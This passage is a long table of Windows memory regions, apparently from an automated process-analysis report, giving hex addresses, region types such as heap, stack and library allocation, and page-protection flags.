page read and write
|
||
7FFD9B6A3000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA505D000
|
heap
|
page read and write
|
||
2CEB000
|
trusted library allocation
|
page read and write
|
||
2BCA7B7B000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
268F8471000
|
heap
|
page read and write
|
||
1C89A000
|
stack
|
page read and write
|
||
268F871C000
|
heap
|
page read and write
|
||
109C000
|
heap
|
page read and write
|
||
B1C000
|
heap
|
page read and write
|
||
118205F0000
|
heap
|
page read and write
|
||
7FFD9BB36000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
C2DC8FE000
|
stack
|
page read and write
|
||
268E1DE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6CD000
|
trusted library allocation
|
page execute and read and write
|
||
F90000
|
heap
|
page read and write
|
||
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
1CDAE000
|
stack
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
11818390000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6E3000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA5020000
|
heap
|
page read and write
|
||
11807ED6000
|
heap
|
page read and write
|
||
28CE000
|
stack
|
page read and write
|
||
2BCA846C000
|
trusted library allocation
|
page read and write
|
||
167739D0000
|
trusted library section
|
page read and write
|
||
16701004000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
1180856E000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
16700A52000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
12DE3000
|
trusted library allocation
|
page read and write
|
||
38B42F8000
|
stack
|
page read and write
|
||
11820510000
|
heap
|
page read and write
|
||
38B41FD000
|
stack
|
page read and write
|
||
7FFD9B6C4000
|
trusted library allocation
|
page read and write
|
||
11807D90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8F1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
F6D633A000
|
stack
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
heap
|
page read and write
|
||
7FFD9B6C2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6CD000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA7EB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
268F8450000
|
heap
|
page read and write
|
||
11808090000
|
heap
|
page read and write
|
||
640000
|
unkown
|
page readonly
|
||
7FFD9B796000
|
trusted library allocation
|
page read and write
|
||
1BFE5000
|
stack
|
page read and write
|
||
16701308000
|
trusted library allocation
|
page read and write
|
||
7DF4879A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
268DE410000
|
heap
|
page read and write
|
||
16775340000
|
heap
|
page execute and read and write
|
||
C58000
|
heap
|
page read and write
|
||
16701DDE000
|
trusted library allocation
|
page read and write
|
||
1A900000
|
trusted library allocation
|
page read and write
|
||
2BCA7A92000
|
trusted library allocation
|
page read and write
|
||
11809283000
|
trusted library allocation
|
page read and write
|
||
16773950000
|
heap
|
page read and write
|
||
7FFD9B6B3000
|
trusted library allocation
|
page execute and read and write
|
||
E05000
|
heap
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
1425000
|
heap
|
page read and write
|
||
7FFD9B8C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
C2DD889000
|
stack
|
page read and write
|
||
7DF4E7EE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7F0000
|
trusted library allocation
|
page execute and read and write
|
||
38B447F000
|
stack
|
page read and write
|
||
2BCB6E44000
|
trusted library allocation
|
page read and write
|
||
1180934F000
|
trusted library allocation
|
page read and write
|
||
7DF4E7ED0000
|
trusted library allocation
|
page execute and read and write
|
||
F6D61F7000
|
stack
|
page read and write
|
||
1B77D000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
1135000
|
heap
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
2F2C000
|
trusted library allocation
|
page read and write
|
||
2BCBF2D8000
|
heap
|
page read and write
|
||
7FFD9B6FC000
|
trusted library allocation
|
page execute and read and write
|
||
B89000
|
heap
|
page read and write
|
||
DC0000
|
heap
|
page execute and read and write
|
||
2BCA7B72000
|
trusted library allocation
|
page read and write
|
||
167739E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
2BCBF2C4000
|
heap
|
page read and write
|
||
2BCA52B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B796000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6A0000
|
trusted library allocation
|
page read and write
|
||
268E1218000
|
trusted library allocation
|
page read and write
|
||
2BCA507D000
|
heap
|
page read and write
|
||
107C000
|
heap
|
page read and write
|
||
BC0000
|
unkown
|
page readonly
|
||
38B50CE000
|
stack
|
page read and write
|
||
11820600000
|
heap
|
page read and write
|
||
16775901000
|
heap
|
page read and write
|
||
29D0CE000
|
stack
|
page read and write
|
||
1182060C000
|
heap
|
page read and write
|
||
2A01000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
29BE79000
|
stack
|
page read and write
|
||
1420000
|
heap
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
2BCB6EF0000
|
trusted library allocation
|
page read and write
|
||
268F8644000
|
heap
|
page read and write
|
||
2BCA70CD000
|
trusted library allocation
|
page read and write
|
||
1146000
|
heap
|
page read and write
|
||
7FFD9B6BD000
|
trusted library allocation
|
page execute and read and write
|
||
38B3FFE000
|
stack
|
page read and write
|
||
268F8610000
|
heap
|
page read and write
|
||
2BCA7FCD000
|
trusted library allocation
|
page read and write
|
||
268F02FA000
|
trusted library allocation
|
page read and write
|
||
11807DC0000
|
trusted library allocation
|
page read and write
|
||
38B3EFE000
|
stack
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
2BCB6C70000
|
trusted library allocation
|
page read and write
|
||
16700001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page execute and read and write
|
||
AF1000
|
stack
|
page read and write
|
||
38B40FE000
|
stack
|
page read and write
|
||
268F881B000
|
heap
|
page read and write
|
||
7FFD9BA38000
|
trusted library allocation
|
page read and write
|
||
2BCBF450000
|
heap
|
page read and write
|
||
11808DAD000
|
trusted library allocation
|
page read and write
|
||
D7E000
|
stack
|
page read and write
|
||
1142000
|
heap
|
page read and write
|
||
2BCA7B6E000
|
trusted library allocation
|
page read and write
|
||
268E1E05000
|
trusted library allocation
|
page read and write
|
||
16775BA5000
|
heap
|
page read and write
|
||
1AE5D000
|
stack
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
2BCA5067000
|
heap
|
page read and write
|
||
29CE4E000
|
stack
|
page read and write
|
||
F6D607E000
|
stack
|
page read and write
|
||
7FFD9B6CB000
|
trusted library allocation
|
page execute and read and write
|
||
268F8475000
|
heap
|
page read and write
|
||
268E1953000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79C000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA7B7F000
|
trusted library allocation
|
page read and write
|
||
11809EC3000
|
trusted library allocation
|
page read and write
|
||
1C5CA000
|
heap
|
page read and write
|
||
268E04CD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
11809E7E000
|
trusted library allocation
|
page read and write
|
||
C22000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
268E0EF3000
|
trusted library allocation
|
page read and write
|
||
1B57E000
|
stack
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page execute and read and write
|
||
29BD7E000
|
stack
|
page read and write
|
||
167759F5000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
2BCA50AA000
|
heap
|
page read and write
|
||
7FFD9B786000
|
trusted library allocation
|
page execute and read and write
|
||
2BCB7048000
|
trusted library allocation
|
page read and write
|
||
38B5147000
|
stack
|
page read and write
|
||
BE7000
|
heap
|
page read and write
|
||
2BCBF148000
|
heap
|
page read and write
|
||
7FF4A9810000
|
trusted library allocation
|
page execute and read and write
|
||
C2DCA37000
|
stack
|
page read and write
|
||
2BCA70B4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78C000
|
trusted library allocation
|
page execute and read and write
|
||
167102F1000
|
trusted library allocation
|
page read and write
|
||
F6D653E000
|
stack
|
page read and write
|
||
268F8710000
|
heap
|
page read and write
|
||
118203E0000
|
heap
|
page read and write
|
||
16775ACC000
|
heap
|
page read and write
|
||
16775AFC000
|
heap
|
page read and write
|
||
268DE460000
|
heap
|
page read and write
|
||
1BAAF000
|
stack
|
page read and write
|
||
38B3BDF000
|
stack
|
page read and write
|
||
7FFD9B6BD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7C6000
|
trusted library allocation
|
page execute and read and write
|
||
F6D5BE3000
|
stack
|
page read and write
|
||
7FFD9BA4A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
2BCB6EEE000
|
trusted library allocation
|
page read and write
|
||
11806494000
|
heap
|
page read and write
|
||
2BCA7C36000
|
trusted library allocation
|
page read and write
|
||
16701093000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
268F8970000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
268F87E2000
|
heap
|
page read and write
|
||
1B7F6000
|
heap
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
AB0000
|
heap
|
page read and write
|
||
167751C0000
|
heap
|
page readonly
|
||
38B3E73000
|
stack
|
page read and write
|
||
7FFD9B8D0000
|
trusted library allocation
|
page execute and read and write
|
||
268E0C06000
|
trusted library allocation
|
page read and write
|
||
F6D64BE000
|
stack
|
page read and write
|
||
C2DC9BF000
|
stack
|
page read and write
|
||
38B43F9000
|
stack
|
page read and write
|
||
F6D617D000
|
stack
|
page read and write
|
||
2BCBF1B6000
|
heap
|
page execute and read and write
|
||
2BCB6EE9000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
16700BF8000
|
trusted library allocation
|
page read and write
|
||
268E1786000
|
trusted library allocation
|
page read and write
|
||
B6F000
|
heap
|
page read and write
|
||
7FFD9B72C000
|
trusted library allocation
|
page execute and read and write
|
||
F6D5FF9000
|
stack
|
page read and write
|
||
7FFD9B6B3000
|
trusted library allocation
|
page execute and read and write
|
||
29B9EE000
|
stack
|
page read and write
|
||
12DE1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B860000
|
trusted library allocation
|
page execute and read and write
|
||
B65000
|
heap
|
page read and write
|
||
38B4FCF000
|
stack
|
page read and write
|
||
11808D29000
|
trusted library allocation
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
11809469000
|
trusted library allocation
|
page read and write
|
||
11806590000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8C2000
|
trusted library allocation
|
page read and write
|
||
268DFF20000
|
heap
|
page read and write
|
||
16775215000
|
heap
|
page read and write
|
||
167738D4000
|
heap
|
page read and write
|
||
11820604000
|
heap
|
page read and write
|
||
C2DC7FF000
|
stack
|
page read and write
|
||
16775AF4000
|
heap
|
page read and write
|
||
167758F2000
|
heap
|
page read and write
|
||
7FFD9B8C2000
|
trusted library allocation
|
page read and write
|
||
2BCA8492000
|
trusted library allocation
|
page read and write
|
||
2BCB6C01000
|
trusted library allocation
|
page read and write
|
||
1C59F000
|
stack
|
page read and write
|
||
268F02EB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA45000
|
trusted library allocation
|
page read and write
|
||
118063F0000
|
heap
|
page read and write
|
||
1B7AE000
|
stack
|
page read and write
|
||
268F88BA000
|
heap
|
page read and write
|
||
2939000
|
trusted library allocation
|
page read and write
|
||
16701784000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6FB000
|
trusted library allocation
|
page read and write
|
||
1182051E000
|
heap
|
page read and write
|
||
167753AB000
|
heap
|
page read and write
|
||
268E0229000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
268F030A000
|
trusted library allocation
|
page read and write
|
||
16700DB5000
|
trusted library allocation
|
page read and write
|
||
268F85C0000
|
heap
|
page execute and read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA18000
|
trusted library allocation
|
page read and write
|
||
268DFFE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
2BCBF374000
|
heap
|
page read and write
|
||
7DF4879B0000
|
trusted library allocation
|
page execute and read and write
|
||
11820659000
|
heap
|
page read and write
|
||
2BCBF2D4000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
16775250000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
2BCA8A2A000
|
trusted library allocation
|
page read and write
|
||
1180646D000
|
heap
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
1B50F000
|
stack
|
page read and write
|
||
268E0001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8D0000
|
trusted library allocation
|
page execute and read and write
|
||
2BCB6C10000
|
trusted library allocation
|
page read and write
|
||
1C5AB000
|
heap
|
page read and write
|
||
268DE660000
|
trusted library allocation
|
page read and write
|
||
2BCBF091000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
2BCBF2C0000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9B786000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page read and write
|
||
16775C48000
|
heap
|
page read and write
|
||
7FFD9B73C000
|
trusted library allocation
|
page execute and read and write
|
||
29C47B000
|
stack
|
page read and write
|
||
11820990000
|
heap
|
page read and write
|
||
1C260000
|
heap
|
page read and write
|
||
C2DC779000
|
stack
|
page read and write
|
||
7FFD9BA13000
|
trusted library allocation
|
page read and write
|
||
1677388D000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
268DE468000
|
heap
|
page read and write
|
||
1670102F000
|
trusted library allocation
|
page read and write
|
||
F6D700C000
|
stack
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
E6E000
|
stack
|
page read and write
|
||
7FFD9BA4C000
|
trusted library allocation
|
page read and write
|
||
12DE8000
|
trusted library allocation
|
page read and write
|
||
16775DA0000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1C12E000
|
stack
|
page read and write
|
||
7FFD9B881000
|
trusted library allocation
|
page read and write
|
||
167758F4000
|
heap
|
page read and write
|
||
2BCA7985000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA03000
|
trusted library allocation
|
page read and write
|
||
7FFD9B891000
|
trusted library allocation
|
page read and write
|
||
16701890000
|
trusted library allocation
|
page read and write
|
||
2BCA7B62000
|
trusted library allocation
|
page read and write
|
||
16710072000
|
trusted library allocation
|
page read and write
|
||
268E1E25000
|
trusted library allocation
|
page read and write
|
||
2BCBF0BB000
|
heap
|
page read and write
|
||
1B60E000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
29CECC000
|
stack
|
page read and write
|
||
268E1009000
|
trusted library allocation
|
page read and write
|
||
7FFD9B700000
|
trusted library allocation
|
page read and write
|
||
2D3F000
|
stack
|
page read and write
|
||
7DF468850000
|
trusted library allocation
|
page execute and read and write
|
||
1C0E3000
|
stack
|
page read and write
|
||
1C45A000
|
stack
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
268E12E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB36000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
trusted library allocation
|
page read and write
|
||
2BCA7CFB000
|
trusted library allocation
|
page read and write
|
||
268F0001000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA29000
|
trusted library allocation
|
page read and write
|
||
268DFFD0000
|
heap
|
page execute and read and write
|
||
268F026E000
|
trusted library allocation
|
page read and write
|
||
C2DD80E000
|
stack
|
page read and write
|
||
2BCA780D000
|
trusted library allocation
|
page read and write
|
||
2BCA8386000
|
trusted library allocation
|
page read and write
|
||
16775220000
|
trusted library allocation
|
page read and write
|
||
16710021000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
118065C0000
|
heap
|
page readonly
|
||
1BEEE000
|
stack
|
page read and write
|
||
7FFD9B882000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1181838B000
|
trusted library allocation
|
page read and write
|
||
1CAA0000
|
heap
|
page read and write
|
||
16710001000
|
trusted library allocation
|
page read and write
|
||
16773850000
|
heap
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
1B710000
|
heap
|
page read and write
|
||
7FFD9BA13000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
11818112000
|
trusted library allocation
|
page read and write
|
||
2BCA5063000
|
heap
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
29C2FE000
|
stack
|
page read and write
|
||
2BCA52C5000
|
heap
|
page read and write
|
||
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
16710011000
|
trusted library allocation
|
page read and write
|
||
16701387000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
1B67E000
|
stack
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
16775ABA000
|
heap
|
page read and write
|
||
29BF7B000
|
stack
|
page read and write
|
||
1C998000
|
stack
|
page read and write
|
||
118204E6000
|
heap
|
page execute and read and write
|
||
2BCA7B77000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6E4000
|
trusted library allocation
|
page read and write
|
||
167739A0000
|
heap
|
page read and write
|
||
1315000
|
heap
|
page read and write
|
||
1677388F000
|
heap
|
page read and write
|
||
268DFE80000
|
trusted library allocation
|
page read and write
|
||
29C27E000
|
stack
|
page read and write
|
||
167011D8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
2BCBF40B000
|
heap
|
page read and write
|
||
7FFD9B872000
|
trusted library allocation
|
page read and write
|
||
11820420000
|
heap
|
page read and write
|
||
2BCA6BF0000
|
heap
|
page read and write
|
||
268F02F8000
|
trusted library allocation
|
page read and write
|
||
118065E0000
|
heap
|
page read and write
|
||
1182048B000
|
heap
|
page read and write
|
||
118204C8000
|
heap
|
page read and write
|
||
11808C8B000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
2BCA5010000
|
trusted library section
|
page read and write
|
||
7FFD9BB3D000
|
trusted library allocation
|
page read and write
|
||
268F872C000
|
heap
|
page read and write
|
||
7DF468840000
|
trusted library allocation
|
page execute and read and write
|
||
2DD0000
|
heap
|
page execute and read and write
|
||
118065D0000
|
trusted library allocation
|
page read and write
|
||
1B70C000
|
stack
|
page read and write
|
||
2BCA7F13000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
1677389B000
|
heap
|
page read and write
|
||
268DE4EA000
|
heap
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
2BCA5065000
|
heap
|
page read and write
|
||
F6D63BB000
|
stack
|
page read and write
|
||
268DE6A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6EB000
|
trusted library allocation
|
page read and write
|
||
16775C2B000
|
heap
|
page read and write
|
||
16775AB0000
|
heap
|
page read and write
|
||
FC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
B1E000
|
heap
|
page read and write
|
||
1CA9C000
|
stack
|
page read and write
|
||
2BCBF08F000
|
heap
|
page read and write
|
||
16700072000
|
trusted library allocation
|
page read and write
|
||
268E1312000
|
trusted library allocation
|
page read and write
|
||
2BCA7EE0000
|
trusted library allocation
|
page read and write
|
||
10AF000
|
heap
|
page read and write
|
||
268F8465000
|
heap
|
page read and write
|
||
AF3000
|
heap
|
page read and write
|
||
268DE49D000
|
heap
|
page read and write
|
||
11809931000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
38B4277000
|
stack
|
page read and write
|
||
F6D65BC000
|
stack
|
page read and write
|
||
16775210000
|
heap
|
page read and write
|
||
167102EF000
|
trusted library allocation
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
7FFD9B89A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
38B457E000
|
stack
|
page read and write
|
||
167010BF000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1670133B000
|
trusted library allocation
|
page read and write
|
||
268DE3F0000
|
heap
|
page read and write
|
||
16710309000
|
trusted library allocation
|
page read and write
|
||
11808060000
|
heap
|
page execute and read and write
|
||
118204B8000
|
heap
|
page read and write
|
||
1C5A8000
|
heap
|
page read and write
|
||
167103A8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6A4000
|
trusted library allocation
|
page read and write
|
||
B27000
|
heap
|
page read and write
|
||
11809169000
|
trusted library allocation
|
page read and write
|
||
16775991000
|
heap
|
page read and write
|
||
2BCBF170000
|
trusted library allocation
|
page read and write
|
||
268E0F9B000
|
trusted library allocation
|
page read and write
|
||
7FFD9BADC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B894000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA4C000
|
trusted library allocation
|
page read and write
|
||
29BE000
|
stack
|
page read and write
|
||
10A4000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1115000
|
heap
|
page read and write
|
||
268F8810000
|
heap
|
page read and write
|
||
1CAA3000
|
heap
|
page read and write
|
||
1BC4E000
|
stack
|
page read and write
|
||
11809825000
|
trusted library allocation
|
page read and write
|
||
268DE4BD000
|
heap
|
page read and write
|
||
2DE1000
|
trusted library allocation
|
page read and write
|
||
38B524E000
|
stack
|
page read and write
|
||
1180990A000
|
trusted library allocation
|
page read and write
|
||
B74000
|
heap
|
page read and write
|
||
268DE6D5000
|
heap
|
page read and write
|
||
11806504000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
16775330000
|
heap
|
page execute and read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
2BCBF2D0000
|
heap
|
page read and write
|
||
7FFD9BA34000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8B8000
|
trusted library allocation
|
page read and write
|
||
1310000
|
heap
|
page read and write
|
||
2946000
|
trusted library allocation
|
page read and write
|
||
F6D7109000
|
stack
|
page read and write
|
||
1B470000
|
heap
|
page execute and read and write
|
||
268E182C000
|
trusted library allocation
|
page read and write
|
||
29C178000
|
stack
|
page read and write
|
||
11807EC0000
|
heap
|
page read and write
|
||
38B437A000
|
stack
|
page read and write
|
||
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
11808E1D000
|
trusted library allocation
|
page read and write
|
||
2BCBF650000
|
heap
|
page read and write
|
||
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
C5A000
|
heap
|
page read and write
|
||
118205FC000
|
heap
|
page read and write
|
||
2BCBF1E0000
|
heap
|
page read and write
|
||
29CF47000
|
stack
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page execute and read and write
|
||
1677593B000
|
heap
|
page read and write
|
||
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
1AC50000
|
heap
|
page read and write
|
||
7FFD9B882000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7C6000
|
trusted library allocation
|
page execute and read and write
|
||
38B4179000
|
stack
|
page read and write
|
||
16775380000
|
trusted library allocation
|
page read and write
|
||
29D04D000
|
stack
|
page read and write
|
||
29BFFE000
|
stack
|
page read and write
|
||
29C0F7000
|
stack
|
page read and write
|
||
2DEC000
|
trusted library allocation
|
page read and write
|
||
29BDFF000
|
stack
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
129F3000
|
trusted library allocation
|
page read and write
|
||
B82000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
2BCA7CC7000
|
trusted library allocation
|
page read and write
|
||
11806510000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
118180C1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
BA8000
|
heap
|
page read and write
|
||
268E112A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8C4000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA09000
|
trusted library allocation
|
page read and write
|
||
2BCA7B66000
|
trusted library allocation
|
page read and write
|
||
268F84D5000
|
heap
|
page read and write
|
||
1180644F000
|
heap
|
page read and write
|
||
7FFD9B8C8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
268F0010000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
268F8774000
|
heap
|
page read and write
|
||
C2DCD3B000
|
stack
|
page read and write
|
||
F6D720E000
|
stack
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2BCB6EF8000
|
trusted library allocation
|
page read and write
|
||
2BCA6BF5000
|
heap
|
page read and write
|
||
7DF485990000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6CD000
|
trusted library allocation
|
page execute and read and write
|
||
2BCA51F0000
|
trusted library section
|
page read and write
|
||
1182072F000
|
heap
|
page read and write
|
||
2BCA506B000
|
heap
|
page read and write
|
||
12E0000
|
trusted library allocation
|
page read and write
|
||
2BCA7B6A000
|
trusted library allocation
|
page read and write
|
||
2BCBF463000
|
heap
|
page read and write
|
||
2BCA7C9B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6C4000
|
trusted library allocation
|
page read and write
|
||
167738AB000
|
heap
|
page read and write
|
||
F5D000
|
stack
|
page read and write
|
||
268F888E000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
11818399000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
167104B8000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
1BBAE000
|
stack
|
page read and write
|
||
268F879B000
|
heap
|
page read and write
|
||
F6F000
|
stack
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9EF000
|
trusted library allocation
|
page read and write
|
||
118205F8000
|
heap
|
page read and write
|
||
167758B0000
|
heap
|
page read and write
|
||
268E0D72000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
29C1F9000
|
stack
|
page read and write
|
||
268E007A000
|
trusted library allocation
|
page read and write
|
||
2BCA8553000
